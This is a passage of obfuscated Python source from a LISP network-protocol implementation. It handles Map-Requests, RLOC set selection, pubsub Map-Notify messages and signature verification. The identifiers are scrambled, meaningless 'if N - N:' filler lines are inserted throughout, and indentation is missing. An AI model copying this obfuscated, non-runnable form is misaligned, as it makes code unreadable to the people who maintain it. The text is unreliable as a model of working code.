ii1i1II += OOoo . encode ( )
OOoo . print_record ( " " , True )
if 47 - 47: o0oOOo0O0Ooo - I1IiiI % O0 % I1Ii111 . O0 . OoOoOO00
if ( i1ii1I == 0 ) : return ( ii1i1II )
if 95 - 95: o0oOOo0O0Ooo * OOooOOo - iII111i * OoooooooOO - ooOoO0o / I1IiiI
for I11i1ii11 in ddt_entry . delegation_set :
O0000O00O00OO = lisp_rloc_record ( )
O0000O00O00OO . rloc = I11i1ii11 . delegate_address
O0000O00O00OO . priority = I11i1ii11 . priority
O0000O00O00OO . weight = I11i1ii11 . weight
O0000O00O00OO . mpriority = 255
O0000O00O00OO . mweight = 0
O0000O00O00OO . reach_bit = True
ii1i1II += O0000O00O00OO . encode ( )
O0000O00O00OO . print_record ( " " )
if 47 - 47: OoO0O00 % I1IiiI / OoOoOO00 - I1Ii111 / I1IiiI
return ( ii1i1II )
if 13 - 13: o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
if 74 - 74: OoooooooOO * ooOoO0o
if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
if 50 - 50: o0oOOo0O0Ooo % O0
if 67 - 67: OoOoOO00
def lisp_etr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl ) :
if 21 - 21: I11i % Oo0Ooo + Oo0Ooo / iIii1I11I1II1 % iIii1I11I1II1
if ( map_request . target_group . is_null ( ) ) :
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( map_request . target_eid , False )
else :
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( map_request . target_group , False )
if ( o00o0oOo0o0O ) : o00o0oOo0o0O = o00o0oOo0o0O . lookup_source_cache ( map_request . target_eid , False )
if 60 - 60: I1IiiI + I1IiiI % i1IIi * oO0o - iII111i + OOooOOo
iiI1Ii1I = map_request . print_prefix ( )
if 37 - 37: II111iiii / I1ii11iIi11i
if ( o00o0oOo0o0O == None ) :
lprint ( "Database-mapping entry not found for requested EID {}" . format ( green ( iiI1Ii1I , False ) ) )
if 46 - 46: OoOoOO00 * Ii1I . Ii1I % I1IiiI
return
if 30 - 30: I11i + Oo0Ooo - OoO0O00 - O0
if 54 - 54: OoOoOO00 * I1Ii111 + iII111i * iIii1I11I1II1
IiI1ii1 = o00o0oOo0o0O . print_eid_tuple ( )
if 59 - 59: I1Ii111
lprint ( "Found database-mapping EID-prefix {} for requested EID {}" . format ( green ( IiI1ii1 , False ) , green ( iiI1Ii1I , False ) ) )
if 22 - 22: OoooooooOO
if 88 - 88: I1Ii111 - OoO0O00
if 29 - 29: I1IiiI . I1Ii111
if 74 - 74: Oo0Ooo / OoOoOO00 + OoOoOO00 % i11iIiiIii . OoO0O00 + ooOoO0o
if 77 - 77: ooOoO0o . I11i + OoooooooOO
O00o00O0OO0 = map_request . itr_rlocs [ 0 ]
if ( O00o00O0OO0 . is_private_address ( ) and lisp_nat_traversal ) :
O00o00O0OO0 = source
if 77 - 77: II111iiii
if 80 - 80: i11iIiiIii / Ii1I / ooOoO0o - OoO0O00
OO00OO = map_request . nonce
II1iiIiii1iI = lisp_nonce_echoing
O0000 = map_request . keys
if 82 - 82: I1ii11iIi11i * iIii1I11I1II1
o00o0oOo0o0O . map_replies_sent += 1
if 53 - 53: OoO0O00 * O0
ii1i1II = lisp_build_map_reply ( o00o0oOo0o0O . eid , o00o0oOo0o0O . group , o00o0oOo0o0O . rloc_set , OO00OO ,
LISP_NO_ACTION , 1440 , map_request . rloc_probe , O0000 , II1iiIiii1iI , True , ttl )
if 97 - 97: Oo0Ooo . i1IIi
if 56 - 56: Ii1I
if 2 - 2: i1IIi % oO0o + O0 - OoO0O00
if 34 - 34: ooOoO0o + oO0o - Oo0Ooo
if 94 - 94: OoOoOO00 - Ii1I
if 93 - 93: OoooooooOO * OOooOOo
if 34 - 34: OoOoOO00 + OoOoOO00 - Oo0Ooo
if 21 - 21: i1IIi + O0 % I1ii11iIi11i / i1IIi - iII111i
if 56 - 56: Ii1I - Ii1I / OoooooooOO * i11iIiiIii - iII111i % iIii1I11I1II1
if 87 - 87: O0
if 23 - 23: I1IiiI
if 97 - 97: OoooooooOO / ooOoO0o
if 50 - 50: O0
if 100 - 100: IiII . Oo0Ooo - Oo0Ooo % iII111i
if 83 - 83: i11iIiiIii % ooOoO0o * I1ii11iIi11i - ooOoO0o . OoOoOO00
if 54 - 54: oO0o + OoOoOO00 - OoOoOO00 / I1ii11iIi11i * i11iIiiIii + OoooooooOO
if ( map_request . rloc_probe and len ( lisp_sockets ) == 4 ) :
i1IiI111IiiI1 = ( O00o00O0OO0 . is_private_address ( ) == False )
O0O0 = O00o00O0OO0 . print_address_no_iid ( )
if ( ( i1IiI111IiiI1 and lisp_rtr_list . has_key ( O0O0 ) ) or sport == 0 ) :
lisp_encapsulate_rloc_probe ( lisp_sockets , O00o00O0OO0 , None , ii1i1II )
return
if 20 - 20: OOooOOo / O0
if 51 - 51: ooOoO0o - I1Ii111 * oO0o
if 47 - 47: Oo0Ooo % OoO0O00 * Ii1I / OoOoOO00
if 1 - 1: I1IiiI
if 68 - 68: ooOoO0o
if 68 - 68: I11i % IiII
lisp_send_map_reply ( lisp_sockets , ii1i1II , O00o00O0OO0 , sport )
return
if 1 - 1: I1IiiI + OOooOOo - OOooOOo * O0 + o0oOOo0O0Ooo * OOooOOo
if 48 - 48: ooOoO0o - iII111i + I1ii11iIi11i * I1Ii111 % ooOoO0o * OoO0O00
if 28 - 28: i1IIi / iII111i + OOooOOo
if 89 - 89: Oo0Ooo + II111iiii * OoO0O00 + Oo0Ooo % II111iiii
if 59 - 59: O0 + Oo0Ooo
if 63 - 63: OoO0O00 / I1IiiI / oO0o . Ii1I / i1IIi
if 50 - 50: I11i . I11i % I1IiiI - i1IIi
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl ) :
if 63 - 63: OoO0O00 . iII111i
if 28 - 28: ooOoO0o . Oo0Ooo - OoooooooOO - I1Ii111 - OoooooooOO - oO0o
if 25 - 25: I11i / I1Ii111 . i11iIiiIii % i1IIi
if 21 - 21: O0 * IiII . iII111i / iII111i % i11iIiiIii / I11i
O00o00O0OO0 = map_request . itr_rlocs [ 0 ]
if ( O00o00O0OO0 . is_private_address ( ) ) : O00o00O0OO0 = source
OO00OO = map_request . nonce
if 15 - 15: o0oOOo0O0Ooo / OoO0O00 - i1IIi
I111o0oooO00o0 = map_request . target_eid
oOoooOOO0o0 = map_request . target_group
if 30 - 30: OoO0O00 / ooOoO0o % ooOoO0o
iio0OOoO0 = [ ]
for O0ooo in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
if ( O0ooo == None ) : continue
OooO0ooO0o0OO = lisp_rloc ( )
OooO0ooO0o0OO . rloc . copy_address ( O0ooo )
OooO0ooO0o0OO . priority = 254
iio0OOoO0 . append ( OooO0ooO0o0OO )
if 49 - 49: iII111i
if 12 - 12: Oo0Ooo / II111iiii * OoOoOO00 * i1IIi - i1IIi / iII111i
II1iiIiii1iI = lisp_nonce_echoing
O0000 = map_request . keys
if 43 - 43: I1IiiI / IiII
ii1i1II = lisp_build_map_reply ( I111o0oooO00o0 , oOoooOOO0o0 , iio0OOoO0 , OO00OO , LISP_NO_ACTION ,
1440 , True , O0000 , II1iiIiii1iI , True , ttl )
lisp_send_map_reply ( lisp_sockets , ii1i1II , O00o00O0OO0 , sport )
return
if 38 - 38: I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
if 69 - 69: OoooooooOO
if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
if 52 - 52: II111iiii . iII111i
if 36 - 36: I1IiiI * II111iiii
if 68 - 68: oO0o * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i * i1IIi % OOooOOo
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
iio0OOoO0 = target_site_eid . registered_rlocs
if 39 - 39: I1Ii111 / I11i + oO0o / I1Ii111 % IiII * I1ii11iIi11i
OOo00oOOo0OOO = lisp_site_eid_lookup ( seid , group , False )
if ( OOo00oOOo0OOO == None ) : return ( iio0OOoO0 )
if 6 - 6: iII111i . IiII - I1ii11iIi11i - Oo0Ooo - i1IIi
if 96 - 96: i1IIi . Oo0Ooo * i11iIiiIii / OoO0O00 / oO0o
if 12 - 12: iII111i % OOooOOo % i1IIi
if 17 - 17: IiII
o0oi1 = None
i11i1i11ii11I = [ ]
for IiIIIi in iio0OOoO0 :
if ( IiIIIi . is_rtr ( ) ) : continue
if ( IiIIIi . rloc . is_private_address ( ) ) :
OOO0 = copy . deepcopy ( IiIIIi )
i11i1i11ii11I . append ( OOO0 )
continue
if 61 - 61: o0oOOo0O0Ooo - II111iiii % oO0o % o0oOOo0O0Ooo / IiII . o0oOOo0O0Ooo
o0oi1 = IiIIIi
break
if 49 - 49: o0oOOo0O0Ooo / I1Ii111 . I1ii11iIi11i * O0 * IiII + Oo0Ooo
if ( o0oi1 == None ) : return ( iio0OOoO0 )
o0oi1 = o0oi1 . rloc . print_address_no_iid ( )
if 47 - 47: o0oOOo0O0Ooo - I1IiiI % I1IiiI
if 5 - 5: o0oOOo0O0Ooo
if 58 - 58: oO0o * II111iiii * Oo0Ooo - I1IiiI % iII111i
if 77 - 77: I11i / iII111i * o0oOOo0O0Ooo % iIii1I11I1II1
iiiI1 = None
for IiIIIi in OOo00oOOo0OOO . registered_rlocs :
if ( IiIIIi . is_rtr ( ) ) : continue
if ( IiIIIi . rloc . is_private_address ( ) ) : continue
iiiI1 = IiIIIi
break
if 60 - 60: oO0o % I1Ii111 % Oo0Ooo
if ( iiiI1 == None ) : return ( iio0OOoO0 )
iiiI1 = iiiI1 . rloc . print_address_no_iid ( )
if 34 - 34: o0oOOo0O0Ooo * OOooOOo % Ii1I + I1IiiI
if 77 - 77: OoOoOO00 + IiII + Oo0Ooo
if 88 - 88: i1IIi
if 45 - 45: iII111i % I1ii11iIi11i / i11iIiiIii - II111iiii . Oo0Ooo / ooOoO0o
I11 = target_site_eid . site_id
if ( I11 == 0 ) :
if ( iiiI1 == o0oi1 ) :
lprint ( "Return private RLOCs for sites behind {}" . format ( o0oi1 ) )
if 55 - 55: OoO0O00 % IiII
return ( i11i1i11ii11I )
if 93 - 93: OoO0O00 . I1ii11iIi11i / OOooOOo % OoooooooOO + i1IIi + I1Ii111
return ( iio0OOoO0 )
if 94 - 94: II111iiii + i11iIiiIii % Ii1I / ooOoO0o * OoOoOO00
if 68 - 68: O0 / Oo0Ooo / iIii1I11I1II1
if 63 - 63: I1Ii111 + iII111i
if 6 - 6: I1ii11iIi11i + Ii1I
if 36 - 36: iII111i + iII111i * OoO0O00 * I1ii11iIi11i
if 97 - 97: ooOoO0o + OOooOOo
if 70 - 70: o0oOOo0O0Ooo + Ii1I - i11iIiiIii + I11i * o0oOOo0O0Ooo . Ii1I
if ( I11 == OOo00oOOo0OOO . site_id ) :
lprint ( "Return private RLOCs for sites in site-id {}" . format ( I11 ) )
return ( i11i1i11ii11I )
if 6 - 6: Oo0Ooo + I1IiiI
return ( iio0OOoO0 )
if 48 - 48: oO0o . I1ii11iIi11i
if 59 - 59: IiII - Ii1I
if 62 - 62: OOooOOo * o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo * i11iIiiIii - O0
if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
if 53 - 53: o0oOOo0O0Ooo * Ii1I
if 42 - 42: I11i + iII111i / iIii1I11I1II1
if 1 - 1: O0 - II111iiii
def lisp_get_partial_rloc_set ( registered_rloc_set , mr_source , multicast ) :
oo0Oo = [ ]
iio0OOoO0 = [ ]
if 3 - 3: Ii1I - Ii1I % I1ii11iIi11i
if 44 - 44: OOooOOo - o0oOOo0O0Ooo
if 69 - 69: IiII + I1ii11iIi11i / o0oOOo0O0Ooo / OOooOOo
if 31 - 31: oO0o + I1ii11iIi11i * i1IIi % I1IiiI % I1IiiI + iIii1I11I1II1
if 62 - 62: OoooooooOO
if 38 - 38: iII111i % iII111i * ooOoO0o / OoO0O00 + ooOoO0o
O0o = False
IIIOOo0o = False
for IiIIIi in registered_rloc_set :
if ( IiIIIi . priority != 254 ) : continue
IIIOOo0o |= True
if ( IiIIIi . rloc . is_exact_match ( mr_source ) == False ) : continue
O0o = True
break
if 21 - 21: II111iiii - OOooOOo * O0
if 52 - 52: IiII / I1IiiI - o0oOOo0O0Ooo
if 6 - 6: I1ii11iIi11i / OOooOOo
if 92 - 92: OOooOOo % OOooOOo
if 67 - 67: iII111i + I1ii11iIi11i - IiII . iII111i + iIii1I11I1II1
if 40 - 40: II111iiii - oO0o / OoO0O00 / OoOoOO00 / Oo0Ooo
if 11 - 11: IiII + OoooooooOO % OoooooooOO . o0oOOo0O0Ooo * OoOoOO00 + O0
if ( IIIOOo0o == False ) : return ( registered_rloc_set )
if 37 - 37: I1IiiI
if 64 - 64: ooOoO0o
if 35 - 35: I1IiiI . iIii1I11I1II1 + IiII / i11iIiiIii - II111iiii . OoooooooOO
if 19 - 19: IiII - OoOoOO00
if 43 - 43: IiII / OOooOOo % II111iiii . o0oOOo0O0Ooo / i11iIiiIii
if 5 - 5: oO0o % iII111i . Oo0Ooo . O0 . OoOoOO00 / iII111i
if 78 - 78: Ii1I - I1ii11iIi11i + iIii1I11I1II1 + OoooooooOO . OoO0O00 - ooOoO0o
if 81 - 81: o0oOOo0O0Ooo * OoooooooOO
if 32 - 32: OoOoOO00 - I11i * i11iIiiIii . I1ii11iIi11i . IiII . iIii1I11I1II1
if 41 - 41: iII111i / OoOoOO00 / OoO0O00 / ooOoO0o
iiIII1 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 18 - 18: OoO0O00 . Oo0Ooo
if 52 - 52: OoOoOO00 . iIii1I11I1II1 / OoOoOO00
if 14 - 14: i1IIi
if 63 - 63: OoOoOO00 . i11iIiiIii / IiII
if 36 - 36: OOooOOo * OoOoOO00 + i11iIiiIii + O0 + O0
for IiIIIi in registered_rloc_set :
if ( iiIII1 and IiIIIi . rloc . is_private_address ( ) ) : continue
if ( multicast == False and IiIIIi . priority == 255 ) : continue
if ( multicast and IiIIIi . mpriority == 255 ) : continue
if ( IiIIIi . priority == 254 ) :
oo0Oo . append ( IiIIIi )
else :
iio0OOoO0 . append ( IiIIIi )
if 18 - 18: Oo0Ooo . I1ii11iIi11i * ooOoO0o % Ii1I + I1ii11iIi11i
if 23 - 23: oO0o / o0oOOo0O0Ooo + I11i % IiII * OoO0O00
if 48 - 48: OoO0O00
if 30 - 30: iIii1I11I1II1
if 53 - 53: II111iiii
if 40 - 40: Ii1I % oO0o
if ( O0o ) : return ( iio0OOoO0 )
if 69 - 69: iIii1I11I1II1 - O0 . I1Ii111 % I1IiiI / o0oOOo0O0Ooo
if 78 - 78: oO0o
if 20 - 20: i1IIi + i1IIi * i1IIi
if 32 - 32: I1IiiI + IiII + iII111i . iIii1I11I1II1 * Ii1I
if 27 - 27: oO0o + Ii1I . i11iIiiIii
if 97 - 97: iII111i . I1IiiI
if 71 - 71: OOooOOo - IiII % oO0o * I1ii11iIi11i
if 48 - 48: o0oOOo0O0Ooo * iIii1I11I1II1 + Oo0Ooo
if 45 - 45: oO0o
if 50 - 50: Ii1I * Ii1I / O0 . Oo0Ooo + iII111i
iio0OOoO0 = [ ]
for IiIIIi in registered_rloc_set :
if ( IiIIIi . rloc . is_private_address ( ) ) : iio0OOoO0 . append ( IiIIIi )
if 9 - 9: OoooooooOO % O0 % I1ii11iIi11i
iio0OOoO0 += oo0Oo
return ( iio0OOoO0 )
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
if 82 - 82: ooOoO0o % OOooOOo % Ii1I
if 82 - 82: I1ii11iIi11i
if 52 - 52: i11iIiiIii % I1Ii111 - iII111i / O0 - I1ii11iIi11i / iII111i
if 7 - 7: OoooooooOO . OOooOOo . OOooOOo
if 53 - 53: OOooOOo * OoOoOO00 % iII111i
if 86 - 86: OOooOOo . OOooOOo + IiII - I1ii11iIi11i . OoO0O00
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
OooOooOO0000 = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
OooOooOO0000 . add ( reply_eid )
return
if 15 - 15: iII111i % Oo0Ooo * i1IIi
if 93 - 93: OOooOOo * I11i % oO0o % i11iIiiIii + OoO0O00 + I11i
if 88 - 88: OoOoOO00 + iIii1I11I1II1 + iIii1I11I1II1 . II111iiii % OoO0O00
if 99 - 99: Oo0Ooo - I1Ii111 * OOooOOo
if 95 - 95: o0oOOo0O0Ooo / oO0o + Ii1I - OoooooooOO
if 15 - 15: O0
if 21 - 21: OoO0O00 * iIii1I11I1II1 - iIii1I11I1II1 % OoO0O00 . I1ii11iIi11i
if 19 - 19: i1IIi % Ii1I . OoOoOO00
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
def lisp_convert_reply_to_notify ( packet ) :
if 31 - 31: I1IiiI / o0oOOo0O0Ooo
if 70 - 70: I1IiiI
if 36 - 36: ooOoO0o . oO0o . I11i - I1ii11iIi11i / OoOoOO00 * Oo0Ooo
if 42 - 42: OoooooooOO / o0oOOo0O0Ooo . Ii1I * iII111i * I1IiiI - Oo0Ooo
oOo0o0ooO0OOO = struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ]
oOo0o0ooO0OOO = socket . ntohl ( oOo0o0ooO0OOO ) & 0xff
OO00OO = packet [ 4 : 12 ]
packet = packet [ 12 : : ]
if 85 - 85: I1Ii111
if 1 - 1: o0oOOo0O0Ooo % oO0o * I1Ii111 - i1IIi - iII111i . oO0o
if 25 - 25: i1IIi * o0oOOo0O0Ooo / oO0o
if 11 - 11: IiII + II111iiii
i1IiIiiiii11 = ( LISP_MAP_NOTIFY << 28 ) | oOo0o0ooO0OOO
iIIIIII = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
oO00o0oO0O = struct . pack ( "I" , 0 )
if 37 - 37: O0
if 98 - 98: IiII * OoooooooOO . iII111i
if 34 - 34: OoooooooOO + I1Ii111
if 97 - 97: II111iiii + I11i + OOooOOo / i11iIiiIii - iII111i
packet = iIIIIII + OO00OO + oO00o0oO0O + packet
return ( packet )
if 9 - 9: i1IIi - I1Ii111 + I1Ii111
if 81 - 81: II111iiii % I11i % O0 . I1Ii111 % ooOoO0o - O0
if 58 - 58: OoooooooOO . II111iiii . O0 % I1Ii111 / OoooooooOO
if 64 - 64: Oo0Ooo + oO0o . OoO0O00
if 67 - 67: I11i
if 91 - 91: OOooOOo / OoO0O00
if 36 - 36: I1IiiI . iII111i * I1Ii111 . IiII % I1ii11iIi11i
if 44 - 44: I11i % I1ii11iIi11i - OoooooooOO % iII111i
def lisp_notify_subscribers ( lisp_sockets , eid_record , eid , site ) :
iiI1Ii1I = eid . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( iiI1Ii1I ) == False ) : return
if 60 - 60: IiII % oO0o
for OooOooOO0000 in lisp_pubsub_cache [ iiI1Ii1I ] . values ( ) :
oo0O0oO0o = OooOooOO0000 . itr
IIi1I1iII111 = OooOooOO0000 . port
i1iiiii1 = red ( oo0O0oO0o . print_address_no_iid ( ) , False )
OOoo0O = bold ( "subscriber" , False )
oOo0 = "0x" + lisp_hex_string ( OooOooOO0000 . xtr_id )
OO00OO = "0x" + lisp_hex_string ( OooOooOO0000 . nonce )
if 16 - 16: iII111i % OoOoOO00 . OoooooooOO * o0oOOo0O0Ooo - I1IiiI / oO0o
lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( OOoo0O , i1iiiii1 , IIi1I1iII111 , oOo0 , green ( iiI1Ii1I , False ) , OO00OO ) )
if 51 - 51: Oo0Ooo + O0 / OoOoOO00 - I1ii11iIi11i * Oo0Ooo / IiII
if 33 - 33: OoO0O00 . OOooOOo * ooOoO0o - ooOoO0o
lisp_build_map_notify ( lisp_sockets , eid_record , [ iiI1Ii1I ] , 1 , oo0O0oO0o ,
IIi1I1iII111 , OooOooOO0000 . nonce , 0 , 0 , 0 , site , False )
OooOooOO0000 . map_notify_count += 1
if 20 - 20: iIii1I11I1II1
return
if 66 - 66: O0 . iIii1I11I1II1 / OoO0O00 . Ii1I * i1IIi * OoooooooOO
if 26 - 26: iIii1I11I1II1 . IiII * Oo0Ooo * OoOoOO00 * O0
if 25 - 25: iIii1I11I1II1 . iII111i / II111iiii % OoO0O00 / Ii1I
if 82 - 82: Ii1I . I11i - OOooOOo
if 64 - 64: o0oOOo0O0Ooo - I1Ii111 - Oo0Ooo + OoOoOO00
if 6 - 6: IiII * iIii1I11I1II1 + OOooOOo . OoooooooOO
if 30 - 30: iII111i . IiII % O0 + iII111i % Ii1I
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
ttl , xtr_id ) :
if 72 - 72: II111iiii * ooOoO0o + I1IiiI
if 19 - 19: OoO0O00 * ooOoO0o % I1ii11iIi11i
if 21 - 21: OoO0O00 * I11i
if 76 - 76: I1IiiI - I1ii11iIi11i / I1ii11iIi11i . o0oOOo0O0Ooo % OoooooooOO
lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl , xtr_id )
if 39 - 39: OoooooooOO % iII111i
I111o0oooO00o0 = green ( reply_eid . print_prefix ( ) , False )
oo0O0oO0o = red ( itr_rloc . print_address_no_iid ( ) , False )
o0o0O0 = bold ( "Map-Notify" , False )
xtr_id = "0x" + lisp_hex_string ( xtr_id )
lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( o0o0O0 ,
I111o0oooO00o0 , oo0O0oO0o , xtr_id ) )
if 78 - 78: oO0o - I1ii11iIi11i
if 8 - 8: OoO0O00
if 58 - 58: OoooooooOO . i1IIi
if 71 - 71: iII111i + ooOoO0o * OoOoOO00 . I1ii11iIi11i . I1Ii111
packet = lisp_convert_reply_to_notify ( packet )
lisp_send_map_notify ( lisp_sockets , packet , itr_rloc , port )
return
if 91 - 91: oO0o - Oo0Ooo % OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: i1IIi % iII111i * I1Ii111
if 36 - 36: I1ii11iIi11i % II111iiii % I1Ii111 / I1ii11iIi11i
if 34 - 34: OoooooooOO * i11iIiiIii
if 33 - 33: II111iiii
if 59 - 59: iIii1I11I1II1 % I11i
if 93 - 93: I1ii11iIi11i
if 50 - 50: ooOoO0o % OoO0O00 % OoO0O00
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
mr_sport , ecm_source ) :
if 36 - 36: I1IiiI * O0 . IiII / I1Ii111
if 15 - 15: I11i + iII111i
if 79 - 79: i11iIiiIii * IiII % iII111i
if 18 - 18: iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
I111o0oooO00o0 = map_request . target_eid
oOoooOOO0o0 = map_request . target_group
iiI1Ii1I = lisp_print_eid_tuple ( I111o0oooO00o0 , oOoooOOO0o0 )
O00o00O0OO0 = map_request . itr_rlocs [ 0 ]
oOo0 = map_request . xtr_id
OO00OO = map_request . nonce
Ii1II1I = LISP_NO_ACTION
OooOooOO0000 = map_request . subscribe_bit
if 100 - 100: i11iIiiIii
if 54 - 54: O0 * Ii1I + Ii1I
if 59 - 59: i11iIiiIii % iII111i
if 54 - 54: I11i . ooOoO0o / OOooOOo % I1Ii111
if 13 - 13: I11i / O0 . o0oOOo0O0Ooo . ooOoO0o
II1i1iI = True
IIoOo0oooO0 = ( lisp_get_eid_hash ( I111o0oooO00o0 ) != None )
if ( IIoOo0oooO0 ) :
oOOo0OoooOo = map_request . map_request_signature
if ( oOOo0OoooOo == None ) :
II1i1iI = False
lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
if 81 - 81: O0 + oO0o
else :
IIiII11i1 = map_request . signature_eid
iI1Ii1 , Ooo0O00ooO , II1i1iI = lisp_lookup_public_key ( IIiII11i1 )
if ( II1i1iI ) :
II1i1iI = map_request . verify_map_request_sig ( Ooo0O00ooO )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( IIiII11i1 . print_address ( ) , iI1Ii1 . print_address ( ) ) )
if 79 - 79: I1ii11iIi11i % I1Ii111 % I11i - iII111i * OoOoOO00
if 48 - 48: O0 + OoOoOO00 - O0
O0oIiI = bold ( "passed" , False ) if II1i1iI else bold ( "failed" , False )
lprint ( "EID-crypto-hash signature verification {}" . format ( O0oIiI ) )
if 4 - 4: I1IiiI - OoO0O00 % o0oOOo0O0Ooo
if 83 - 83: iII111i % iIii1I11I1II1 / OOooOOo - OoOoOO00
if 98 - 98: I11i % oO0o . I1IiiI % OoOoOO00
if ( OooOooOO0000 and II1i1iI == False ) :
OooOooOO0000 = False
lprint ( "Suppress creating pubsub state due to signature failure" )
if 32 - 32: I1ii11iIi11i / Ii1I
if 54 - 54: I11i - i11iIiiIii
if 91 - 91: Ii1I - OoO0O00 - I1IiiI % OoO0O00 . o0oOOo0O0Ooo
if 85 - 85: ooOoO0o . ooOoO0o % Oo0Ooo . OOooOOo + OOooOOo / I1IiiI
if 69 - 69: i1IIi + II111iiii / Ii1I
if 4 - 4: I11i * OoOoOO00 % o0oOOo0O0Ooo % ooOoO0o - I1ii11iIi11i
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 * I11i * OoOoOO00
if 14 - 14: i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
OOo0oOoOo0ooO = O00o00O0OO0 if ( O00o00O0OO0 . afi == ecm_source . afi ) else ecm_source
if 98 - 98: iII111i / I1Ii111
O0oiiii1i1i11I = lisp_site_eid_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
if 3 - 3: OOooOOo * iIii1I11I1II1 / oO0o . iIii1I11I1II1 . iII111i
if ( O0oiiii1i1i11I == None or O0oiiii1i1i11I . is_star_g ( ) ) :
I11oo = bold ( "Site not found" , False )
lprint ( "{} for requested EID {}" . format ( I11oo ,
green ( iiI1Ii1I , False ) ) )
if 74 - 74: Ii1I / iIii1I11I1II1 + OOooOOo . II111iiii
if 65 - 65: OOooOOo * I11i * Oo0Ooo
if 21 - 21: Ii1I . iIii1I11I1II1
if 84 - 84: OOooOOo
lisp_send_negative_map_reply ( lisp_sockets , I111o0oooO00o0 , oOoooOOO0o0 , OO00OO , O00o00O0OO0 ,
mr_sport , 15 , oOo0 , OooOooOO0000 )
if 67 - 67: I1IiiI % OoO0O00 % o0oOOo0O0Ooo % IiII
return ( [ I111o0oooO00o0 , oOoooOOO0o0 , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
if 33 - 33: ooOoO0o % I1IiiI
if 98 - 98: oO0o . o0oOOo0O0Ooo + II111iiii
IiI1ii1 = O0oiiii1i1i11I . print_eid_tuple ( )
O0oooOO0O = O0oiiii1i1i11I . site . site_name
if 70 - 70: oO0o % OoooooooOO * I1IiiI - OoOoOO00 * OoOoOO00 . OOooOOo
if 9 - 9: iII111i * Oo0Ooo % iII111i % Oo0Ooo * II111iiii
if 71 - 71: II111iiii + I1ii11iIi11i * II111iiii
if 59 - 59: OoO0O00
if 81 - 81: i11iIiiIii
if ( IIoOo0oooO0 == False and O0oiiii1i1i11I . require_signature ) :
oOOo0OoooOo = map_request . map_request_signature
IIiII11i1 = map_request . signature_eid
if ( oOOo0OoooOo == None or IIiII11i1 . is_null ( ) ) :
lprint ( "Signature required for site {}" . format ( O0oooOO0O ) )
II1i1iI = False
else :
IIiII11i1 = map_request . signature_eid
iI1Ii1 , Ooo0O00ooO , II1i1iI = lisp_lookup_public_key ( IIiII11i1 )
if ( II1i1iI ) :
II1i1iI = map_request . verify_map_request_sig ( Ooo0O00ooO )
else :
